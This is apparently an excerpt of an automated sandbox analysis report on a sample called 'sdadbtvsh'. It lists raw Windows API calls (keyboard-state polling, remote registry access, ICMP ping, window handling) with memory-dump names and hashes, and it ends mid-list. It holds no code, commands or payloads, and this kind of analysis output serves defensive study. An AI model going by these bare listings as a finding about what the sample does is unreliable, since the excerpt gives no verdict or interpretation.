                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005FEF80
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 005FEF9F
                                                                                              • Sleep.KERNEL32(000000FA), ref: 005FEFAA
                                                                                              • IsWindow.USER32 ref: 005FEFB6
                                                                                              • EndDialog.USER32(00000000), ref: 005FEFC7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: 83e19bab32ae6831023ea3684cb31e65df1f4c4930084b9f7c3807b208363b69
                                                                                              • Instruction ID: 627d986ea875832cea027b54c612b4bbf0e29e9ed4f4412f0738a6fdede417f5
                                                                                              • Opcode Fuzzy Hash: 83e19bab32ae6831023ea3684cb31e65df1f4c4930084b9f7c3807b208363b69
                                                                                              • Instruction Fuzzy Hash: 6E21967420060DBFEB116F68EC8AA3A3F6BFB45344F102415F611E23B1DBB98D11DA64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005FF289
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005FF29F
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005FF2B0
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005FF2C2
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005FF2D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_wcslen
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2420728520-1007645807
                                                                                              • Opcode ID: c0c21dab9ba73a309bb113454df8efeb8ca89c0d6d7556513796d1b91ef29f24
                                                                                              • Instruction ID: eb663468f9fa3a57cabe1c6f4660a60812c3b6473e5444edb72be3784b97aabc
                                                                                              • Opcode Fuzzy Hash: c0c21dab9ba73a309bb113454df8efeb8ca89c0d6d7556513796d1b91ef29f24
                                                                                              • Instruction Fuzzy Hash: F5118635A5025E79EB20A7A1EC4EEFF6E7DFFD1B10F4104397901A20D5DAA05D09C6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 005C3024
                                                                                                • Part of subcall function 005C2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4), ref: 005C2D6E
                                                                                                • Part of subcall function 005C2D58: GetLastError.KERNEL32(00661DC4,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4,00661DC4), ref: 005C2D80
                                                                                              • _free.LIBCMT ref: 005C3030
                                                                                              • _free.LIBCMT ref: 005C303B
                                                                                              • _free.LIBCMT ref: 005C3046
                                                                                              • _free.LIBCMT ref: 005C3051
                                                                                              • _free.LIBCMT ref: 005C305C
                                                                                              • _free.LIBCMT ref: 005C3067
                                                                                              • _free.LIBCMT ref: 005C3072
                                                                                              • _free.LIBCMT ref: 005C307D
                                                                                              • _free.LIBCMT ref: 005C308B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID: &c
                                                                                              • API String ID: 776569668-4082378586
                                                                                              • Opcode ID: 96c349439abc3286ae55b1c7eda44685d8258047572edaf41c196ba228b131f4
                                                                                              • Instruction ID: beeaf40d00580931100dd75d64da22f2a0540b3bead8dab811e3b8703e6bcc34
                                                                                              • Opcode Fuzzy Hash: 96c349439abc3286ae55b1c7eda44685d8258047572edaf41c196ba228b131f4
                                                                                              • Instruction Fuzzy Hash: 551193B610014DAFCB01EF94C846EDD3FA5FF55350F4140A9BA199B232DA71EAD29F80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 005FA8EE
                                                                                              • SetKeyboardState.USER32(?), ref: 005FA959
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 005FA979
                                                                                              • GetKeyState.USER32(000000A0), ref: 005FA990
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 005FA9BF
                                                                                              • GetKeyState.USER32(000000A1), ref: 005FA9D0
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 005FA9FC
                                                                                              • GetKeyState.USER32(00000011), ref: 005FAA0A
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 005FAA33
                                                                                              • GetKeyState.USER32(00000012), ref: 005FAA41
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 005FAA6A
                                                                                              • GetKeyState.USER32(0000005B), ref: 005FAA78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 2a119c73e546fae8533a4fccc23efb3b09b2a5711c19d7fad50d08c7e13cbc8d
                                                                                              • Instruction ID: 7d3547355d7d9e012808db6b6f29164c3fbdf3ae5b94bbf28ebf40e73f67c37f
                                                                                              • Opcode Fuzzy Hash: 2a119c73e546fae8533a4fccc23efb3b09b2a5711c19d7fad50d08c7e13cbc8d
                                                                                              • Instruction Fuzzy Hash: 5451E8B090478D69FB35E7B089147FABFB5BF11380F088599C6CA171C2DA989A4CC763
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 005F6571
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 005F658A
                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005F65E8
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 005F65F8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 005F660A
                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 005F665E
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 005F666C
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 005F667E
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 005F66C0
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 005F66D3
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005F66E9
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 005F66F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 30f035c5f3ba3ac39014e00604c58a6a0688acf0ba44bf9ac8a3f53624acdcc6
                                                                                              • Instruction ID: cc17216296801493ced375040109abdbb08a250ad653cec95321858ac442d24e
                                                                                              • Opcode Fuzzy Hash: 30f035c5f3ba3ac39014e00604c58a6a0688acf0ba44bf9ac8a3f53624acdcc6
                                                                                              • Instruction Fuzzy Hash: 485121B1B00609AFDF18CF68DD99AAEBBB6FB48301F108129F919E7294D7749D05CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005921E4: GetWindowLongW.USER32(?,000000EB), ref: 005921F2
                                                                                              • GetSysColor.USER32(0000000F), ref: 00592102
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 3d7688ca2352286d364e211ab96059b6fba8292fd866a9663ee3ddb6bdb32ac5
                                                                                              • Instruction ID: fd63abb28ad0947bee5cc5d4d6911a9a85c91a02b64c36427f9e17b4ac464a7a
                                                                                              • Opcode Fuzzy Hash: 3d7688ca2352286d364e211ab96059b6fba8292fd866a9663ee3ddb6bdb32ac5
                                                                                              • Instruction Fuzzy Hash: 57418031100A40AFDF345F38DC48BBA3F66BB46320F144656FAA2872E1C7719D62EB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005F1032
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005F104E
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005F106A
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005F1094
                                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 005F10BC
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F10C7
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F10CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 323675364-22481851
                                                                                              • Opcode ID: 1a7888126e99668851b795285d69178c334b32a4e672af43577df6db7cc3f601
                                                                                              • Instruction ID: c987d3319b487fa1ad82c8fa7553131dd51018361975ae16c07486235fcaf8d8
                                                                                              • Opcode Fuzzy Hash: 1a7888126e99668851b795285d69178c334b32a4e672af43577df6db7cc3f601
                                                                                              • Instruction Fuzzy Hash: 30410772C1062EABDF21EFA4DC899EDBBB9BF54300F444129F901A3161EB749E09CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0062499A
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 006249A1
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006249B4
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 006249BC
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 006249C7
                                                                                              • DeleteDC.GDI32(00000000), ref: 006249D1
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006249DB
                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 006249F1
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 006249FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              • API String ID: 2559357485-2160076837
                                                                                              • Opcode ID: c956ee85fb7a22d13e913743b294488614ff3ef6ad7f1bc61684007baf0a1d98
                                                                                              • Instruction ID: ccb28f94c3543853c56693bc7c3a073e665eb11e027fb8cc4ac5a33e2139281e
                                                                                              • Opcode Fuzzy Hash: c956ee85fb7a22d13e913743b294488614ff3ef6ad7f1bc61684007baf0a1d98
                                                                                              • Instruction Fuzzy Hash: EB31AE32100A29AFDF219FA4DC08FDA3B6AFF0D364F110211FA54A61A0CB75D861DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 006145B9
                                                                                              • CoInitialize.OLE32(00000000), ref: 006145E7
                                                                                              • CoUninitialize.OLE32 ref: 006145F1
                                                                                              • _wcslen.LIBCMT ref: 0061468A
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0061470E
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00614832
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0061486B
                                                                                              • CoGetObject.OLE32(?,00000000,00630B64,?), ref: 0061488A
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0061489D
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00614921
                                                                                              • VariantClear.OLEAUT32(?), ref: 00614935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 429561992-0
                                                                                              • Opcode ID: e03d2d51e66c71a8e29b09361ef39d9ca53026cbb4c345a819b885cd3d7553d9
                                                                                              • Instruction ID: 4e2f0cb1686f58307dd543dee758d4421848e432d47e4a4939fd5ea0eeba0b08
                                                                                              • Opcode Fuzzy Hash: e03d2d51e66c71a8e29b09361ef39d9ca53026cbb4c345a819b885cd3d7553d9
                                                                                              • Instruction Fuzzy Hash: 74C138716043059FD700DF24C8849ABBBEAFF89748F18491DF98A9B251DB31ED46CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 0060844D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006084E9
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 006084FD
                                                                                              • CoCreateInstance.OLE32(00630CD4,00000000,00000001,00657E8C,?), ref: 00608549
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006085CE
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00608626
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 006086B1
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006086D4
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 006086DB
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00608730
                                                                                              • CoUninitialize.OLE32 ref: 00608736
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2762341140-0
                                                                                              • Opcode ID: 8233970910bdb4b74b3c6a2299fa6c375dc9992f2094eb9105769a3c3c5ae968
                                                                                              • Instruction ID: 97033b71dda50f0c2e43366983ccdafa2d20a0c1ee9702368c99b36b9b3915fe
                                                                                              • Opcode Fuzzy Hash: 8233970910bdb4b74b3c6a2299fa6c375dc9992f2094eb9105769a3c3c5ae968
                                                                                              • Instruction Fuzzy Hash: D1C11C75A00219AFDB14DFA4C888DAEBBFAFF48304B148198E559DB361CB31ED46CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005F033F
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 005F0398
                                                                                              • VariantInit.OLEAUT32(?), ref: 005F03AA
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 005F03CA
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 005F041D
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 005F0431
                                                                                              • VariantClear.OLEAUT32(?), ref: 005F0446
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 005F0453
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F045C
                                                                                              • VariantClear.OLEAUT32(?), ref: 005F046E
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F0479
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: d5bbd2135794e5beb025c3d19584fcfec60503625b2e8d42b773bcdf72134281
                                                                                              • Instruction ID: 6259f8640bd15d2c509da7de888a18d9ad4fb9ab1b80926ca9a219bb4b170434
                                                                                              • Opcode Fuzzy Hash: d5bbd2135794e5beb025c3d19584fcfec60503625b2e8d42b773bcdf72134281
                                                                                              • Instruction Fuzzy Hash: EC418335A00219DFCF10EF64C8489AE7FB9FF48344F049429EA55A72A1CB34A946CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00592441: GetWindowLongW.USER32(00000000,000000EB), ref: 00592452
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0062A926
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0062A946
                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0062AB83
                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0062ABA1
                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0062ABC2
                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0062ABE1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0062AC06
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0062AC29
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                              • String ID:
                                                                                              • API String ID: 1211466189-3916222277
                                                                                              • Opcode ID: 225a22ea82d8a3ddbfeff561b3d2ffbd5a59e1d3b325ccbd756fc738a93c4188
                                                                                              • Instruction ID: 42b1ec4a26c4aac2e673abd9a90b09017e4d6595406cef6acb766396c605f6d2
                                                                                              • Opcode Fuzzy Hash: 225a22ea82d8a3ddbfeff561b3d2ffbd5a59e1d3b325ccbd756fc738a93c4188
                                                                                              • Instruction Fuzzy Hash: A4B18A31600A29DFDF14CFA9DA857AE7BB3BF44701F188069EC459A295D7B0A980CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00610F19
                                                                                              • inet_addr.WSOCK32(?), ref: 00610F79
                                                                                              • gethostbyname.WSOCK32(?), ref: 00610F85
                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00610F93
                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00611023
                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00611042
                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00611116
                                                                                              • WSACleanup.WSOCK32 ref: 0061111C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
